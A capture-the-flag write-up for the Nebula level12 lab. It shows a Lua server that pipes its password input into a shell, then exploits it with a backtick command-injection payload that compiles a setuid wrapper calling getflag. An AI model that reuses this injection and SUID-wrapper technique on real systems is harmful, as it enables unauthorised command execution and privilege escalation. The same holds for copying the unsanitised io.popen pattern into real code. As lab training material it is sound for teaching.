Nebula level12

About
There is a backdoor process listening on port 50001.
To do this level, log in as the level12 account with the password level12 . Files for this level can be found in /home/flag12.

 1local socket = require("socket")
 2local server = assert(socket.bind("127.0.0.1", 50001))
 3
 4function hash(password) 
 5  prog = io.popen("echo "..password.." | sha1sum", "r")
 6  data = prog:read("*all")
 7  prog:close()
 8
 9  data = string.sub(data, 1, 40)
10
11  return data
12end
13
14
15while 1 do
16  local client = server:accept()
17  client:send("Password: ")
18  client:settimeout(60)
19  local line, err = client:receive()
20  if not err then
21    print("trying " .. line) -- log from where ;\
22    local h = hash(line)
23
24    if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
25      client:send("Better luck next time\n");
26    else
27      client:send("Congrats, your token is 413**CARRIER LOST**\n")
28    end
29
30  end
31
32  client:close()
33end

After initial reading it becomes obvious that you need to execute commands via  hash() function.

It’s also quite obvious which commands and how to do that.

So, in this level (as well as in previous) we will re-use technique from older challenge (namelylevel03).

First create wrapper /tmp/pwn.c:

1 2 3 4 5 6 7 8

#include <stdio.h> #include <stdlib.h>    int main( void ) { system ( "/bin/getflag" ); return 0; }

Next telnet to the server and execute magic string:

level12@nebula:~$ telnet localhost 50001
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Password: `gcc /tmp/pwn.c -o /tmp/pwn && chmod +s /tmp/pwn`;#
Better luck next time
Connection closed by foreign host.

After that we have SUID binary pwn under /tmp:

level12@nebula:~$ /tmp/pwn
You have successfully executed getflag on a target account

Roger-out.